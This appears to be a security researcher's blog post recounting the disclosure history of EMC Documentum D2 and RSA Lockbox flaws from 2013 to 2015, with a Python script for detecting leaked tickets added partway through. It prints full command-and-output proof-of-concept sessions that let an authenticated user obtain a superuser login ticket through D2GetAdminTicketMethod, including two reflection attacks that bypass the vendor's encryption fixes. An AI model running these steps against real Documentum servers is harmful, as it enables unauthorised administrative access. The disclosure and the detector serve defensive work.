Say goodbye LockBox. Part II

Wow, interesting news came from where I didn’t expect it: the ECN guys state that EMC has stopped torturing customers and given up on the idea of using RSA Lockbox.

Here’s a little history of the Lockbox story that you might want to read:

November 2013

Reported to EMC via the support portal, a proof of concept showing how an authenticated user was able to gain superuser privileges:

1> create c6_method_return object set message='test' 
2> go 
object_created 
-------------- 
00002ee280000e9b 
(1 row affected) 
1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b' 
3> go 
... 
(1 row affected) 
1> select message from c6_method_return where r_object_id='00002ee280000e9b' 
2> go 
message 
-------------- 
DM_TICKET=T0..... 
(1 row affected)

January 2014

EMC released Documentum D2 v4.2 and some patches for previous versions; no CVE announced. The EMC “solution” was to encrypt the data passed through c6_method_return objects.

February 2014

Discovered a reflection attack on the D2GetAdminTicketMethod method:

1> create c6_method_return object set message='test' 
2> go 
object_created 
---------------- 
00002f0a8000291d 
(1 row affected) 
1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d 
3> -scope global -timeout 3600' 
4> go 
... 
(1 row affected) 
1> select message from c6_method_return where r_object_id='00002f0a8000291d' 
2> go 
--- 
--- now message contains encrypted data 
--- 
message 
---------------------------------------------------------------------------- 
AAAAEMm1Ypog8dNWsELGoge38HRKVIUnN4/vw4rmz8xJ7EcZuOaQ8rT6vAktbc8g5qV07pme7nt2 
hG4D+ljeR2G5JCystXA8JDDaxmM5xjNfwshe9YldFZBlSinYBvFdigpuZCmTFES+n1b5ZbVC/L7b 
aZ7UI1LI06YhJvRcVjB9mzwMENk8H7KaxDXiFBCEQSiNNn5DoXwjZPWLJd9WTdXIlXpPzWAR2KG+ 
... 
(1 row affected)
1> update c6_method_return object 
2> set parameter_name[0]='-timeout', 
3> set parameter_value[0]=(select message from c6_method_return 
4> where r_object_id='00002f0a8000291d') 
5> where r_object_id='00002f0a8000291d' 
6> go 
objects_updated 
--------------- 
1 
(1 row affected) 
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your UPDATE statement." 

1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d 
3> -scope global' 
4> go 
... 
(1 row affected) 

1> select error from c6_method_return where r_object_id='00002f0a8000291d' 
2> go 
--- 
--- Here a NumberFormatException occurs and the unencrypted ticket is written 
--- to the error field of the c6_method_return object 
--- 
error 
---------------------------------------------------------------------------- 
For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ 
(1 row affected)

March 2014

EMC released patch P01 for EMC Documentum D2 v4.2; no CVE announced. The vendor’s “solution” was not to store the exception message in the “error” attribute of the c6_method_return object if the exception message contains the “DM_TICKET” character sequence.

April 2014

Discovered another reflection attack based on the verbose logging of D2GetAdminTicketMethod:

API> create,c,c6_method_return 
... 
000224838000011f 
API> save,c,l 
... 
OK 
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod, 
ARGUMENTS,S,' 
-docbase_name d2 
-password "" 
-method_return_id 000224838000011f 
-scope global 
-timeout 3600 
' 
... 
q0 
API> next,c,q0 
... 
OK 
API> dump,c,q0 
... 
USER ATTRIBUTES 

result : 0 
process_id : 0 
launch_failed : F 
method_return_val : 0 
os_system_error : No Error 
timed_out : F 
time_out_length : 100 
app_server_host_name : test 
app_server_port : 9080 
app_server_uri : /DmMethods/servlet/DoMethod 
error_message : 

SYSTEM ATTRIBUTES 


APPLICATION ATTRIBUTES 


INTERNAL ATTRIBUTES 


API> close,c,q0 
... 
OK 
API> revert,c,000224838000011f 
... 
OK 
API> get,c,000224838000011f,message 
... 
AAAAEFRN36mfm+NAm49DQAZol1fSBbIgoELusFMnk4eE6r3qNPm/83NDxqiFyoe7Yt/GOjASn6v2 
v2XjSaJq5MqGK8PgrNPbNz5KSAzxcKTWorJym/7ceZsp9l5pSUcDr1mj8xKg0M/iH8AIS8ZGZ9/L 
2bd1FOth86ISN2OnAIOAlzh32I0/YcLYt7nSSfFWDL9H9qzzkp6Za/NeZt4Z0kE1gYNPaVrlPD4D 
qC4bcSb3p54VeAZCVOgpUp3sJ+8kevoRQSKckOTSinBYF4qQa9pnNYQx8wczFk2/pM0pkCdDigyT 
... 

API> ?,c,update c6_method_return object 
set parameter_name[0]='-timeout', 
set parameter_value[0]=(select message from c6_method_return 
where r_object_id='000224838000011f') 
where r_object_id='000224838000011f' 
objects_updated 
--------------- 
1 
(1 row affected) 
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your UPDATE statement." 

--- 
--- Here we put extra parameter "SAVE_RESULTS,B,T" to save execution results 
--- of D2GetAdminTicketMethod docbase method 
--- 
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod, 
ARGUMENTS,S,' 
-docbase_name d2 
-password "" 
-method_return_id 000224838000011f 
-scope global -timeout 3600 
', 
SAVE_RESULTS,B,T 
... 
q0 
API> next,c,q0 
... 
OK 
API> dump,c,q0 
... 
USER ATTRIBUTES 

result : 0902248380002a67 
result_doc_id : 0902248380002a67 
process_id : 0 
launch_failed : F 
method_return_val : 0 
os_system_error : No Error 
timed_out : F 
time_out_length : 100 
app_server_host_name : test 
app_server_port : 9080 
app_server_uri : /DmMethods/servlet/DoMethod 
error_message : 

SYSTEM ATTRIBUTES 


APPLICATION ATTRIBUTES 


INTERNAL ATTRIBUTES 


API> close,c,q0 
... 
OK 
--- 
--- Now message contains encrypted data and error is empty 
--- 
API> get,c,000224838000011f,message 
... 
AAAAEBBMjU2FE27RAOiKSkZdJZM7tl1ht+LhqjvPsmr9DPg3nVgGFyROrETPX6Wy8uuEWbtKSWs3 
MNr8qe3EBNTejbieKZ2YzzUY/46fLdbOQFInczwrNCBoWF9zBnTlhoHK1f+ctpm9nUsK2wJbDZXb 
mk6+1VO5RsUEuFV/qux5LBdXpIr7dRornpDJiBP5hoPILObq4++KvBfhZjaPxEnoOMksfwgmU8XC 
... 
--- 
--- But execution results do contain unencrypted ticket 
--- 
API> get,c,000224838000011f,error 
... 

API> getpath,c,0902248380002a67 
... 
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/09/e1.txt 
API> quit 
Bye 
~]$ cat content_storage_01/00022483/80/00/09/e1.txt 
==== START ======================================================= 
D2-API v4.2.0010 build 378 
DFC version : 7.1.0020.0120 
file.encoding : UTF-8 
Arguments : {-docbase_name=d2, 
-method_return_id=000224838000011f, 
-password=, 
-class_name=com.emc.d2.api.methods.D2GetAdminTicketMethod, 
-scope=global, 
-timeout=DM_TICKET=T0JKIE5VTEwgMAoxMwp.... 
} 
-Scope : global 
-TimeOut : 3600 
-SingleUse : true 
==== END (0.095s) ================================================
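Both reflection attacks above end with a plaintext ticket landing somewhere other than the encrypted message attribute, so a defender's check has to look at the error attribute, the parameter_value repeating attribute and the saved DO_METHOD result file, not just one of them. The Python below is an added example, not code from this post or from D2: SAMPLE_LOG is constructed from the result-file layout shown above, and the attribute names are the ones used in the transcripts.

```python
import re

# A Documentum login ticket is the literal prefix followed by base64 text.
TICKET_RE = re.compile(r"DM_TICKET=[A-Za-z0-9+/=]+")

# Constructed sample of a saved DO_METHOD result file like the one on the page.
SAMPLE_LOG = """==== START =====
Arguments : {-docbase_name=d2,
-password=,
-timeout=DM_TICKET=T0JKIE5VTEwgMAoxMwp,
}
==== END (0.095s) =====
"""

def find_tickets(text):
    """Return every ticket-shaped token in text, deduplicated, in order."""
    found = []
    for m in TICKET_RE.finditer(text):
        if m.group(0) not in found:
            found.append(m.group(0))
    return found

def parse_method_log(text):
    """Parse the 'Arguments : {...}' block of a result file into a dict."""
    block = re.search(r"Arguments\s*:\s*\{(.*?)\}", text, re.S)
    args = {}
    if block:
        for line in block.group(1).splitlines():
            line = line.strip().rstrip(",")
            if line.startswith("-") and "=" in line:
                name, value = line[1:].split("=", 1)
                args[name] = value
    return args

def audit_method_log(text):
    """Flag logged arguments carrying a ticket; none legitimately does."""
    return [f"argument -{n} contains a DM_TICKET value"
            for n, v in parse_method_log(text).items() if TICKET_RE.search(v)]

def audit_method_return(obj):
    """Check a c6_method_return object (dict of attributes): message should be
    encrypted, so a plaintext ticket in any of these attributes is a finding."""
    findings = []
    for attr in ("message", "error"):
        if TICKET_RE.search(obj.get(attr) or ""):
            findings.append(f"{attr} holds a plaintext ticket")
    if any(TICKET_RE.search(v) for v in obj.get("parameter_value", [])):
        findings.append("parameter_value holds a plaintext ticket")
    return findings
```

Run audit_method_log over the files under the content store's method-result area and audit_method_return over a DQL dump of c6_method_return objects; a hit in either place means a ticket escaped the encryption.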

August 2014

EMC announced CVE-2014-2515; the fix was intended to mitigate the previously described reflection attacks.

August 2014

Discovered another set of vulnerabilities in the implementation of the “protection” of the D2GetAdminTicketMethod method. The basic idea: an attacker was able to delete any file from the Content Server (CS) filesystem, and once the Lockbox file was deleted D2 started to use the default passphrase (i.e. com.emc.d2.api.utils.GetCryptedPassword).

August 2014

EMC announced CVE-2015-4537.

February 2015

I got tired and proved that RSA Lockbox is not a security solution: RSA LOCKBOX MAGIC 🙂.

Check and mate.

6 thoughts on “Say goodbye LockBox. Part II”

  1. I think everybody will not miss the LockBox (especially all the related manual, installation tasks…).


  2. Pingback: To sell or not to sell… | Documentum in a (nuts)HELL
